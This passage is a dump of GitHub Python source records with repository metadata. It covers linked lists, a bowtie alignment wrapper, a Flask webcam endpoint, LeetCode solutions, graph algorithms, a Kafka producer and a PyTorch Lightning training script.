Node(object):\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass NodeList(object):\n def __init__(self):\n self.head = Node()\n # self.head = Node()\n self.size = 0\n\n def addNode(self, data):\n newNode = Node(data=data)\n current = self.head\n if current.next is None and current.data is None:\n self.head = newNode\n else:\n while current.next is not None:\n current = current.next\n current.next = newNode\n\n def showList(self):\n current = self.head\n while current is not None:\n print(current.data, end=\" \")\n current = current.next\n print()\n\n\ndef swapPairs(head):\n if head is None or head.next is None:\n return head\n\n firstNode = head\n secondNode = head.next\n\n res = swapPairs(secondNode.next)\n\n firstNode.next = res\n secondNode.next = firstNode\n\n return secondNode\n\n\ndef fun():\n arr = [1, 2, 3, 4]\n nodeList = NodeList()\n for i in arr:\n nodeList.addNode(i)\n nodeList.showList()\n\n print()\n a = swapPairs(nodeList.head)\n b = a\n while b is not None:\n print(b.data, end=\" \")\n b = b.next\n\n print()\n nodeList.showList()\n\n return\n\n\nif __name__ == '__main__':\n start = time.clock()\n fun()\n stop = time.clock()\n print(f\"用时:\", stop - start)\n","repo_name":"gj-hat/Leetcode","sub_path":"24-两两交换链表中的节点/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72310659680","text":"#!/usr/bin/env python\n# small RNA oriented bowtie wrapper\n# version 1.5 17-7-2014: arg parser implementation\n# Usage sRbowtie.py <1 input_fasta_file> <2 alignment method> <3 -v mismatches> <4 out_type> <5 buildIndexIfHistory> <6 fasta/bowtie index> <7 bowtie output> <8 ali_fasta> <9 unali_fasta> <10 --num-threads \\${GALAXY_SLOTS:-4}>\n# current rev: for bowtie __norc, move from --supress 2,6,7,8 to --supress 6,7,8. 
Future Parser must be updated to take into account this standardisation\n# Christophe Antoniewski \n\nimport sys\nimport os\nimport subprocess\nimport tempfile\nimport shutil\nimport argparse\n\n\ndef Parser():\n the_parser = argparse.ArgumentParser(\n description=\"bowtie wrapper for small fasta reads\")\n the_parser.add_argument(\n '--input', action=\"store\", type=str, help=\"input file\")\n the_parser.add_argument(\n '--input-format', dest=\"input_format\", action=\"store\", type=str, help=\"fasta or fastq\")\n the_parser.add_argument('--method', action=\"store\", type=str,\n help=\"RNA, unique, multiple, k_option, n_option, a_option\")\n the_parser.add_argument('--v-mismatches', dest=\"v_mismatches\", action=\"store\",\n type=str, help=\"number of mismatches allowed for the alignments\")\n the_parser.add_argument(\n '--output-format', dest=\"output_format\", action=\"store\", type=str, help=\"tabular, sam, bam\")\n the_parser.add_argument(\n '--output', action=\"store\", type=str, help=\"output file path\")\n the_parser.add_argument(\n '--index-from', dest=\"index_from\", action=\"store\", type=str, help=\"indexed or history\")\n the_parser.add_argument('--index-source', dest=\"index_source\",\n action=\"store\", type=str, help=\"file path to the index source\")\n the_parser.add_argument(\n '--aligned', action=\"store\", type=str, help=\"aligned read file path, maybe None\")\n the_parser.add_argument('--unaligned', action=\"store\",\n type=str, help=\"unaligned read file path, maybe None\")\n the_parser.add_argument('--num-threads', dest=\"num_threads\",\n action=\"store\", type=str, help=\"number of bowtie threads\")\n args = the_parser.parse_args()\n return args\n\n\ndef stop_err(msg):\n sys.stderr.write('%s\\n' % msg)\n sys.exit()\n\n\ndef bowtieCommandLiner(alignment_method=\"RNA\", v_mis=\"1\", out_type=\"tabular\",\n aligned=\"None\", unaligned=\"None\", input_format=\"fasta\", input=\"path\",\n index=\"path\", output=\"path\", pslots=\"4\"):\n if input_format == \"fasta\":\n input_format = \"-f\"\n elif (input_format == \"fastq\") or (input_format == \"fastqsanger\"):\n input_format = \"-q\"\n else:\n raise Exception('input format must be one of fasta or fastq')\n if alignment_method == \"RNA\":\n x = \"-v %s -M 1 --best --strata -p %s --norc --suppress 6,7,8\" % (\n v_mis, pslots)\n elif alignment_method == \"unique\":\n x = \"-v %s -m 1 -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"multiple\":\n x = \"-v %s -M 1 --best --strata -p %s --suppress 6,7,8\" % (\n v_mis, pslots)\n elif alignment_method == \"k_option\":\n x = \"-v %s -k 1 --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"n_option\":\n x = \"-n %s -M 1 --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"a_option\":\n x = \"-v %s -a --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n if aligned == \"None\" and unaligned == \"None\":\n fasta_command = \"\"\n elif aligned != \"None\" and unaligned == \"None\":\n fasta_command = \" --al %s\" % aligned\n elif aligned == \"None\" and unaligned != \"None\":\n fasta_command = \" --un %s\" % unaligned\n else:\n fasta_command = \" --al %s --un %s\" % (aligned, unaligned)\n x = x + fasta_command\n if out_type == \"tabular\":\n return \"bowtie %s %s %s %s > %s\" % (x, index, input_format, input, output)\n elif out_type == \"sam\":\n return \"bowtie %s -S %s %s %s > %s\" % (x, index, input_format, input, output)\n elif out_type == \"bam\":\n return \"bowtie %s -S %s %s %s |samtools view -bS - > %s\" 
% (\n x, index, input_format, input, output)\n\n\ndef bowtie_squash(fasta):\n # make temp directory for bowtie indexes\n tmp_index_dir = tempfile.mkdtemp()\n ref_file = tempfile.NamedTemporaryFile(dir=tmp_index_dir)\n ref_file_name = ref_file.name\n # by default, delete the temporary file, but ref_file.name is now stored\n # in ref_file_name\n ref_file.close()\n # symlink between the fasta source file and the deleted ref_file name\n os.symlink(fasta, ref_file_name)\n # bowtie command line, which will work after changing dir\n # (cwd=tmp_index_dir)\n cmd1 = 'bowtie-build -f %s %s' % (ref_file_name, ref_file_name)\n try:\n FNULL = open(os.devnull, 'w')\n # a path string for a temp file in tmp_index_dir. Just a string\n tmp = tempfile.NamedTemporaryFile(dir=tmp_index_dir).name\n # creates and open a file handler pointing to the temp file\n tmp_stderr = open(tmp, 'wb')\n # both stderr and stdout of bowtie-build are redirected in dev/null\n proc = subprocess.Popen(\n args=cmd1, shell=True, cwd=tmp_index_dir, stderr=FNULL, stdout=FNULL)\n returncode = proc.wait()\n tmp_stderr.close()\n FNULL.close()\n sys.stdout.write(cmd1 + \"\\n\")\n except Exception as e:\n # clean up temp dir\n if os.path.exists(tmp_index_dir):\n shutil.rmtree(tmp_index_dir)\n stop_err('Error indexing reference sequence\\n' + str(e))\n # no Cleaning if no Exception, tmp_index_dir has to be cleaned after\n # bowtie_alignment()\n # bowtie fashion path without extention\n index_full_path = os.path.join(tmp_index_dir, ref_file_name)\n return tmp_index_dir, index_full_path\n\n\ndef bowtie_alignment(command_line, flyPreIndexed=''):\n # make temp directory just for stderr\n tmp_index_dir = tempfile.mkdtemp()\n tmp = tempfile.NamedTemporaryFile(dir=tmp_index_dir).name\n tmp_stderr = open(tmp, 'wb')\n # conditional statement for sorted bam generation viewable in Trackster\n if \"samtools\" in command_line:\n # recover the final output file name\n target_file = command_line.split()[-1]\n path_to_unsortedBam = os.path.join(tmp_index_dir, \"unsorted.bam\")\n path_to_sortedBam = os.path.join(tmp_index_dir, \"unsorted.bam.sorted\")\n first_command_line = \" \".join(\n command_line.split()[:-3]) + \" -o \" + path_to_unsortedBam + \" - \"\n # example: bowtie -v 0 -M 1 --best --strata -p 12 --suppress 6,7,8 -S\n # /home/galaxy/galaxy-dist/bowtie/Dmel/dmel-all-chromosome-r5.49 -f\n # /home/galaxy/galaxy-dist/database/files/003/dataset_3460.dat\n # |samtools view -bS -o /tmp/tmp_PgMT0/unsorted.bam -\n # generates an \"unsorted.bam.sorted.bam file\", NOT an\n # \"unsorted.bam.sorted\" file\n second_command_line = \"samtools sort %s %s\" % (\n path_to_unsortedBam, path_to_sortedBam)\n # fileno() method return the file descriptor number of tmp_stderr\n p = subprocess.Popen(\n args=first_command_line, cwd=tmp_index_dir, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(\"%s\\n\" % first_command_line + str(returncode))\n p = subprocess.Popen(\n args=second_command_line, cwd=tmp_index_dir, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(\"\\n%s\\n\" % second_command_line + str(returncode))\n if os.path.isfile(path_to_sortedBam + \".bam\"):\n shutil.copy2(path_to_sortedBam + \".bam\", target_file)\n else:\n p = subprocess.Popen(\n args=command_line, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(command_line + \"\\n\")\n tmp_stderr.close()\n # cleaning if the index was created in the fly\n if os.path.exists(flyPreIndexed):\n 
shutil.rmtree(flyPreIndexed)\n # cleaning tmp files and directories\n if os.path.exists(tmp_index_dir):\n shutil.rmtree(tmp_index_dir)\n return\n\n\ndef __main__():\n args = Parser()\n F = open(args.output, \"w\")\n if args.index_from == \"history\":\n tmp_dir, index_path = bowtie_squash(args.index_source)\n else:\n tmp_dir, index_path = \"dummy/dymmy\", args.index_source\n command_line = bowtieCommandLiner(args.method, args.v_mismatches, args.output_format,\n args.aligned, args.unaligned, args.input_format, args.input, \n index_path, args.output, args.num_threads)\n bowtie_alignment(command_line, flyPreIndexed=tmp_dir)\n F.close()\nif __name__ == \"__main__\":\n __main__()\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/ARTbio/tools-artbio/tools/msp_sr_bowtie/sRbowtie.py","file_name":"sRbowtie.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"741424643","text":"from flask import Flask\nfrom flask import request, jsonify\nimport cv2\n\napp = Flask(__name__)\n\n@app.route('/LiveCapture', methods=['POST'])\ndef capture():\n\tvideoCaptureObject = cv2.VideoCapture(0)\n\tresult = True\n\twhile(result):\n\t ret,frame = videoCaptureObject.read()\n\t cv2.imwrite(\"NewPicture.jpg\",frame)\n\t result = False\n\tvideoCaptureObject.release()\n\tcv2.destroyAllWindows()\n\treturn \"image captured\"\n\napp.run(debug=True)\n\n","repo_name":"AnuraagBeniwal2610/facial-recognition","sub_path":"flask_basic.py","file_name":"flask_basic.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42019447737","text":"# 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 的那 两个 整数,并返回它们的数组下标。 \n# 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\n# 你可以按任意顺序返回答案。\n#\n# 示例 1: \n# 输入:nums = [2,7,11,15], target = 9\n# 输出:[0,1]\n# 解释:因为 nums[0] + nums[1] == 9 ,返回 [0, 1] 。\n#\n# 示例 2: \n# 输入:nums = [3,2,4], target = 6\n# 输出:[1,2]\n#\n# 示例 3: \n# 输入:nums = [3,3], target = 6\n# 输出:[0,1]\n#\n# 提示: \n# 2 <= nums.length <= 103\n# -109 <= nums[i] <= 109 \n# -109 <= target <= 109 \n# 只会存在一个有效答案 \n# \n# Related Topics 数组 哈希表 \n# 👍 10348 👎 0\n\"\"\"\n思路:\n逆向思维, 创建dict, 遍历数组使用target与每次循环的value进行相减\n若不存在则插入{value: index}, 若存在直接返回结果\n时间复杂度为 O(n)\n若有返回多组结果的情况下可在创建一个list, 之后对通过检验的数据进行append操作即可\n\"\"\"\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n data = {}\n for i, v in enumerate(nums):\n _num = target - v\n if _num in data:\n return [data[_num], i]\n data[v] = i\n\n\nif __name__ == '__main__':\n nums = [3, 3]\n target = 6\n Solution().twoSum(nums, target)\n","repo_name":"wangqingli666/Leetcode","sub_path":"leetcode/editor/cn/[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13052656047","text":"def read_from_file(path):\n with open(path) as f:\n data_list = [int(number) for number in f.read().split()]\n if len(data_list) % 2 == 0 or len(data_list) < 3:\n print(\"Wrong amount of input items\")\n exit()\n return data_list\n\n\ndef create_pairs(data):\n pairs_list = []\n for person_index in range(1, len(data), 2):\n pairs_list.append([data[person_index], data[person_index + 1]])\n return pairs_list\n\n\ndef move_pairs_to_clans(pairs_list):\n original_clans = []\n clans = list(pairs_list)\n for pair in 
pairs_list:\n for clan in clans:\n if set(pair) & set(clan) and pair != clan:\n clan.extend(pair)\n\n for clan in clans:\n for subsequence in clans:\n if set(subsequence).issubset(set(clan)) and subsequence != clan:\n clans.remove(subsequence)\n\n for clan in clans:\n if len(set(clan)) != len(clan):\n original_clans.append(list(set(clan)))\n else:\n original_clans.append(clan)\n return original_clans\n\n\ndef create_adjacency_list(clans):\n adj_dict = {}\n for clan in clans:\n for person_index in range(len(clan)):\n clan_copy = list(clan)\n clan_copy.pop(person_index)\n if clan[person_index] in adj_dict.keys():\n adj_dict[clan[person_index]].append(clan_copy)\n else:\n adj_dict.update({clan[person_index]: clan_copy})\n\n return adj_dict\n\n\ndef rebuild_adjacency_list(adjacency_list):\n new_adjacency_list = {}\n vertexes = adjacency_list.keys()\n for person in vertexes:\n for another_person in vertexes:\n if person == another_person or another_person in adjacency_list[person]:\n continue\n elif person in new_adjacency_list.keys():\n new_adjacency_list[person].append(another_person)\n else:\n new_adjacency_list.update({person: [another_person]})\n return new_adjacency_list\n\n\ndef count_possible_pairs(rebuilt_adjacency_list):\n pairs_count = 0\n dict_keys = rebuilt_adjacency_list.keys()\n for person in dict_keys:\n values = rebuilt_adjacency_list[person]\n for potential_pair in values:\n if potential_pair % 2 != person % 2:\n pairs_count += 1\n return int(pairs_count / 2)\n\n\ndef algorithm(data_path):\n return count_possible_pairs(\n rebuild_adjacency_list(create_adjacency_list(move_pairs_to_clans(create_pairs(read_from_file(data_path))))))\n","repo_name":"nyko27/algo_lab3","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30286595719","text":"import sys\r\nfrom create_dataset import wavelet_data\r\nimport pywt\r\n\r\nimport dill\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\nfrom neupy.algorithms import PNN\r\n\r\nimport time\r\n\r\n#path =\"data\"\r\n\r\nstart_time = time.time()\r\n\r\ndef train(path=\"data\"):\r\n audio_data, audio_label = wavelet_data(path)\r\n\r\n X = np.float32(audio_data) \r\n print('shape X:', str(X.shape))\r\n\r\n Y = audio_label\r\n print('shape Y: ', str(len(Y)))\r\n\r\n # Encode class target ke integer\r\n # encoder = LabelEncoder()\r\n # encoder.fit(img_label)\r\n # Y = encoder.transform(img_label)\r\n # print('shape Y:', str(Y.shape))\r\n\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2) #untuk spilt data latih n uji\r\n print('X_train shape: ', X_train.shape)\r\n print('X_test shape', X_test.shape)\r\n\r\n pnn = PNN(std=2, verbose=False)\r\n pnn.train(X_train, Y_train)\r\n\r\n with open('pnn-model.dill', 'wb') as f:\r\n dill.dump(pnn, f)\r\n\r\n result = pnn.predict(X_test)\r\n\r\n n_predicted_correctly = np.sum(result == Y_test)\r\n n_test_samples = X_test.shape[0]\r\n\r\n print(\"Guessed {} out of {}\".format(n_predicted_correctly, n_test_samples))\r\n print(\"Processiing time : %s seconds\" % (time.time() - start_time))\r\n\r\nif __name__ == '__main__':\r\n 
train()\r\n","repo_name":"josep112/Voice-biometric","sub_path":"test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"74671870880","text":"\"\"\"\nSimple implementation of a directed acyclic graph in python, with depth-first and breadth-first path searches\n\nTODO:\n\nUndirected Graphs, adjacency matrices\n\nhttps://pythonandr.com/2016/07/28/implementing-undirected-graphs-in-python/\n\nShortest path:\n\n Dijkstra's algorithm (weighted edges with non-negative edge weights)\n - https://www.youtube.com/watch?v=pSqmAO-m7Lk\n - https://www.youtube.com/watch?v=pVfj6mxhdMw\n\n Breadth-first search (unweighted edges)\n - https://medium.com/@yasufumy/algorithm-breadth-first-search-408297a075c9\n\n Bellman-Ford algorithm (weighted edges with positive and negative weights)\n - https://www.youtube.com/watch?v=lyw4FaxrwHg\n\nDirected Acyclic Graphs:\n\n Topological sort - https://www.youtube.com/watch?v=eL-KzMXSXXI\n\nPython library implementation of a graph\n\nUndirected graphs and coloring\n\"\"\"\n\n\nclass Node:\n \"\"\"\n The class definition for a graph node\n \"\"\"\n def __init__(self, id):\n self.adjacent = set() # a set (hashset) to store nodes which this node has an edge pointing to\n self.id = id # this node's unique ID\n\n\nclass Graph:\n \"\"\"\n The class object for a graph (DAG)\n \"\"\"\n def __init__(self):\n self.node_dict = {} # a dictionary of nodes keyed by their unique ID\n\n def __str__(self):\n return str(self.node_dict)\n\n def add_node(self, id):\n \"\"\"\n Add a node to the graph\n \"\"\"\n if id in self.node_dict:\n raise ValueError(\"Node with ID {} already exists\".format(id))\n else:\n self.node_dict[id] = Node(id)\n\n def add_edge(self, source_id, dest_id, undirected=False):\n \"\"\"\n Add an edge between source and dest nodes\n \"\"\"\n self.get_node(source_id).adjacent.add(self.get_node(dest_id))\n if undirected:\n self.get_node(dest_id).adjacent.add(self.get_node(source_id))\n\n def get_node(self, id):\n \"\"\"\n Return the Node object associated with an ID\n \"\"\"\n return self.node_dict[id]\n\n def get_adjacency_matrix(self):\n \"\"\"\n Returns the adjacency matrix as a List[List[int]]. 
Entries are in sorted() order by vertex ID\n \"\"\"\n # get IDs in sorted order\n ids = sorted(self.node_dict)\n N = len(ids)\n\n # initialize adjacency matrix\n adj_matrix = [[0 for i in range(N)] for j in range(N)]\n\n # build adjacency matrix\n for id in ids:\n u = self.get_node(id)\n for v in u.adjacent:\n adj_matrix[ids.index(u.id)][ids.index(v.id)] = 1\n\n return adj_matrix\n\n def path_dfs(self, source_id, dest_id):\n \"\"\"\n A DFS algorithm for whether the node with dest_id can be reached from the node with source_id\n \"\"\"\n\n visited = set() # create a set which contains nodes which have been visited\n source = self.get_node(source_id)\n dest = self.get_node(dest_id)\n return self._path_dfs_helper(source, dest, visited)\n\n def _path_dfs_helper(self, source, dest, visited):\n \"\"\"\n This function uses actual nodes, not node ids\n \"\"\"\n # if we've already visited this node, immediately return false\n if source in visited:\n return False\n # now, if we haven't visited this node, but the id is equal to the id we want, return True\n elif source == dest:\n return True\n # finally, if we haven't visited this node, add it to the set of visited nodes, and search its adjacent nodes\n else:\n visited.add(source)\n for node in source.adjacent:\n if self._path_dfs_helper(node, dest, visited):\n return True\n return False\n\n def path_bfs(self, source_id, dest_id):\n \"\"\"\n A BFS algorithm for whether or not there's a path from source to dest, using a queue\n \"\"\"\n source = self.get_node(source_id)\n dest = self.get_node(dest_id)\n\n queue = [source]\n visited = {source}\n\n while queue:\n node = queue.pop(0)\n\n if node == dest:\n return True\n else:\n for adj_node in node.adjacent:\n if adj_node not in visited:\n queue.append(adj_node)\n\n return False\n\n\ndef detect_cycle(graph: Graph):\n \"\"\"\n Returns True if a cycle exists in the graph. Uses the classic white/gray/black set depth first search algorithm\n\n Add all nodes to the white set. Start with any (iter(white).next()) node in the white set, and do our modified DFS\n on it. When we enter DFS, move the node from white set to gray set. For all adjacent nodes, if the node is in the\n black set, don't visit it. If it's in the gray set, then we've found a cycle. If it's in the white set, continue\n with DFS down that node. After returning from all children nodes (i.e. when returning from the recursive dfs\n function), move the node from the gray to the black set.\n \"\"\"\n white = {node for node in graph.node_dict.values()}\n gray = set()\n black = set()\n\n while white:\n # grab a random node in the white set\n node = next(iter(white))\n # return true if the dfs search returns true, there was a cycle, otherwise keep going\n if _cycle_detection_dfs_helper(node, white, gray, black):\n return True\n\n # if we've gone through all the nodes, return false, no cycle\n return False\n\n\ndef _cycle_detection_dfs_helper(node: Node, white: set, gray: set, black: set):\n # move node from white to gray\n white.remove(node)\n gray.add(node)\n\n # iterate through adjacent nodes\n for v in node.adjacent:\n # if v is in the black set, move on. 
We don't want to revisit nodes in the black set\n if v in black:\n continue\n\n # if v is in the gray set, return True now, since we've found a cycle\n if v in gray:\n return True\n\n # else (it must be in the white set), dfs with v, return True if the dfs returns True\n if _cycle_detection_dfs_helper(v, white, gray, black):\n return True\n\n # after finishing recursing, move this node from the gray set to the black set, and return False\n gray.remove(node)\n black.add(node)\n\n return False\n\n\ndef topsort(graph):\n \"\"\"\n Find a topological ordering for a graph. Do this by selecting a node at random in the graph, and then doing a DFS,\n adding the node to the topological ordering in reverse order when the DFS recursive function returns from that node\n \"\"\"\n unvisited = set(graph.node_dict.values())\n top_ordering = []\n\n while unvisited:\n start_node = next(iter(unvisited))\n _topsort_dfs_helper(start_node, unvisited, top_ordering)\n\n return top_ordering[::-1]\n\n\ndef _topsort_dfs_helper(node, unvisited, top_ordering):\n # if we've already visited this node, return immediately\n if node not in unvisited:\n return\n else:\n # set this node as visited\n unvisited.remove(node)\n\n # recurse into adjacent nodes\n for adj_node in node.adjacent:\n _topsort_dfs_helper(adj_node, unvisited, top_ordering)\n\n # when we return from this node, add its id to the topological ordering\n top_ordering.append(node.id)\n\n\nif __name__ == '__main__':\n g = Graph()\n\n g.add_node('A')\n g.add_node('B')\n g.add_node('C')\n g.add_node('D')\n g.add_node('E')\n g.add_node('F')\n g.add_node('G')\n g.add_node('H')\n\n g.add_edge('A', 'B')\n g.add_edge('A', 'C')\n g.add_edge('B', 'H')\n g.add_edge('C', 'F')\n g.add_edge('C', 'G')\n g.add_edge('C', 'D')\n g.add_edge('D', 'H')\n g.add_edge('D', 'E')\n\n # print(g.path_dfs('G', 'H'))\n # print(g.path_bfs('A', 'H'))\n #\n # print(g.get_adjacency_matrix())\n\n print(topsort(g))\n\n print(detect_cycle(g))\n","repo_name":"daveboat/interview_prep","sub_path":"coding_practice/graphs/graph_impl.py","file_name":"graph_impl.py","file_ext":"py","file_size_in_byte":7884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38820612721","text":"'''\nThis script simulates an application which requests prediction for some input samples of Fashion MNIST dataset\n''' \nimport sys, os\nimport time\nimport json\nimport config\ncwd = os.getcwd()\nsys.path.append(cwd.split('ML_system')[0])\n\nfrom Classifier.DataLoader import DataLoader\n\nfrom PubSub_API.BrokerProvider import BrokerProvider\nfrom PubSub_API.Producer import Producer\n\n\ndef main():\n # load dataset\n data = DataLoader()\n data.load_TF_data('fashion_mnist')\n val_input_data = data.test_ds['image']\n\n # instantiate producer\n broker = BrokerProvider(service='kafka')\n producer = broker.get_producer()\n producer.create_topic(config.PREDICTION_REQUEST)\n\n # simulate prediction requests\n for ind, image in enumerate(val_input_data):\n message = {ind: image.tolist()} # send message with a key identyfing which input sample we are passing\n encoded_message = json.dumps(message, indent=2).encode('utf-8')\n producer.write(topic=config.PREDICTION_REQUEST, msg=encoded_message)\n print(f'sent {ind}th image to broker')\n time.sleep(5)\n\n\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"janekzimoch/Using_Kafka_with_ML_model","sub_path":"ML_system/prediction_query_app.py","file_name":"prediction_query_app.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8424893161","text":"import argparse\r\nimport os\r\nimport re\r\nimport shutil\r\nimport subprocess\r\nimport tempfile\r\nimport warnings\r\nfrom datetime import datetime, timedelta\r\nfrom pathlib import Path\r\nfrom types import SimpleNamespace\r\nfrom typing import List\r\n\r\nimport numpy as np\r\nimport pytorch_lightning as pl\r\nimport urllib3\r\nimport yaml\r\nfrom git import Repo\r\nfrom git.exc import InvalidGitRepositoryError\r\nfrom mlflow.tracking import MlflowClient\r\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint\r\nfrom pytorch_lightning.loggers import MLFlowLogger\r\n\r\nimport guided_mvs_lib.models as models\r\nfrom guided_mvs_lib.datasets import MVSDataModule\r\nfrom guided_mvs_lib.datasets.sample_preprocess import MVSSampleTransform\r\nfrom guided_mvs_lib.utils import *\r\n\r\n\r\ndef run_training(\r\n params: Union[str, Path, dict] = \"params.yaml\",\r\n cmdline_args: Optional[List[str]] = None,\r\n datapath: Union[str, Path, None] = None,\r\n outpath: Union[str, Path] = \"output\",\r\n logspath: Union[str, Path] = \".\",\r\n):\r\n # handle args\r\n outpath = Path(outpath)\r\n logspath = Path(logspath)\r\n\r\n # remove annoying torch specific version warnings\r\n warnings.simplefilter(\"ignore\", UserWarning)\r\n urllib3.disable_warnings()\r\n\r\n parser = argparse.ArgumentParser(description=\"training procedure\")\r\n\r\n # training params\r\n parser.add_argument(\r\n \"--gpus\", type=int, default=1, help=\"number of gpus to select for training\"\r\n )\r\n parser.add_argument(\r\n \"--fast-dev-run\",\r\n nargs=\"?\",\r\n const=True,\r\n default=False,\r\n help=\"if execute a single step of train and val, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--limit-train-batches\",\r\n type=int,\r\n default=None,\r\n help=\"limits the number of batches for each epoch, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--limit-val-batches\",\r\n type=int,\r\n default=None,\r\n help=\"limits the number of batches for each epoch, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--resume-from-checkpoint\",\r\n nargs=\"?\",\r\n const=True,\r\n default=False,\r\n help=\"if resume from the last checkpoint or from a specific checkpoint\",\r\n )\r\n parser.add_argument(\r\n \"--load-weights\",\r\n default=None,\r\n type=str,\r\n help=\"load weights either from a mlflow train or from a checkpoint file\",\r\n )\r\n\r\n # experiment date\r\n date = datetime.now().strftime(r\"%Y-%h-%d-%H-%M\")\r\n\r\n # parse arguments and merge from params.yaml\r\n cmd_line_args = parser.parse_args(cmdline_args)\r\n if isinstance(params, dict):\r\n train_args = params\r\n else:\r\n with open(params, \"rt\") as f:\r\n train_args = yaml.safe_load(f)\r\n\r\n args = SimpleNamespace(**vars(cmd_line_args))\r\n for k, v in train_args.items():\r\n if not isinstance(v, dict):\r\n setattr(args, k, v)\r\n else:\r\n setattr(args, k, SimpleNamespace(**v))\r\n\r\n # Train using pytorch lightning\r\n pl.seed_everything(42)\r\n\r\n # Build LightningDataModule\r\n data_module = MVSDataModule(\r\n args.train.dataset,\r\n batch_size=args.train.batch_size,\r\n datapath=datapath,\r\n nviews=args.train.views,\r\n ndepths=args.train.ndepths,\r\n robust_train=True if args.train.dataset == \"dtu_yao\" else False,\r\n 
transform=MVSSampleTransform(\r\n generate_hints=args.train.hints,\r\n hints_perc=args.train.hints_density,\r\n filtering_window=tuple(args.train.hints_filter_window),\r\n ),\r\n )\r\n\r\n # loading model or only weights ?\r\n if args.load_weights is not None and args.resume_from_checkpoint is not False:\r\n print(\"Use either --load-weights or --resume-from-checkpoint\")\r\n return\r\n\r\n ckpt_path = None\r\n steps_re = re.compile(\"step=(\\d+)\")\r\n if args.resume_from_checkpoint is True:\r\n if (outpath / \"ckpts/last.ckpt\").exists():\r\n ckpt_path = outpath / \"ckpts/last.ckpt\"\r\n else:\r\n ckpts = list((outpath / \"ckpts\").glob(\"*.ckpt\"))\r\n steps = [\r\n int(steps_re.findall(ckpt.name)[0])\r\n for ckpt in ckpts\r\n if steps_re.findall(ckpt.name) is not []\r\n ]\r\n if not steps:\r\n print(\"not found any valid checkpoint in\", str(outpath / \"ckpts\"))\r\n return\r\n ckpt_path = ckpts[np.argmax(steps)]\r\n print(f\"resuming from last checkpoint: {ckpt_path}\")\r\n elif args.resume_from_checkpoint is not False:\r\n if Path(args.resume_from_checkpoint).exists():\r\n ckpt_path = args.resume_from_checkpoint\r\n print(f\"resuming from choosen checkpoint: {ckpt_path}\")\r\n else:\r\n print(f\"file {ckpt_path} does not exist\")\r\n return\r\n\r\n # init mlflow logger and model\r\n if ckpt_path is None:\r\n logger = MLFlowLogger(\r\n experiment_name=\"guided-mvs\",\r\n run_name=f\"{args.model}-{date}\",\r\n )\r\n\r\n outpath.mkdir(exist_ok=True, parents=True)\r\n with open(outpath / \"run_uuid\", \"wt\") as f:\r\n f.write(logger.run_id)\r\n\r\n model = models.MVSModel(\r\n args=args,\r\n mlflow_run_id=logger.run_id,\r\n v_num=f\"{args.model}-{'-'.join(date.split('-')[1:3])}\",\r\n )\r\n else:\r\n\r\n with open(outpath / \"run_uuid\", \"rt\") as f:\r\n mlflow_run_id = f.readline().strip()\r\n\r\n model = models.MVSModel.load_from_checkpoint(\r\n ckpt_path,\r\n args=args,\r\n mlflow_run_id=mlflow_run_id,\r\n v_num=f\"{args.model}-{'-'.join(date.split('-')[1:3])}\",\r\n )\r\n logger = MLFlowLogger(\r\n experiment_name=\"guided-mvs\",\r\n run_name=f\"{args.model}-{date}\",\r\n )\r\n logger._run_id = mlflow_run_id\r\n\r\n # if required load weights\r\n if args.load_weights is not None:\r\n mlflow_client: MlflowClient = logger.experiment\r\n if args.load_weights in [\r\n run.run_uuid for run in mlflow_client.list_run_infos(logger.experiment_id)\r\n ]:\r\n # download the model\r\n run_weights_path = mlflow_client.download_artifacts(args.load_weights, \"model.ckpt\")\r\n model.load_state_dict(torch.load(run_weights_path)[\"state_dict\"])\r\n\r\n # track the model weights\r\n run_weights_path = Path(run_weights_path)\r\n shutil.move(run_weights_path, run_weights_path.parent / \"init_weights.ckpt\")\r\n mlflow_client.log_artifact(\r\n logger.run_id, run_weights_path.parent / \"init_weights.ckpt\"\r\n )\r\n mlflow_client.set_tag(logger.run_id, \"load_weights\", args.load_weights)\r\n shutil.rmtree(Path(run_weights_path).parent, 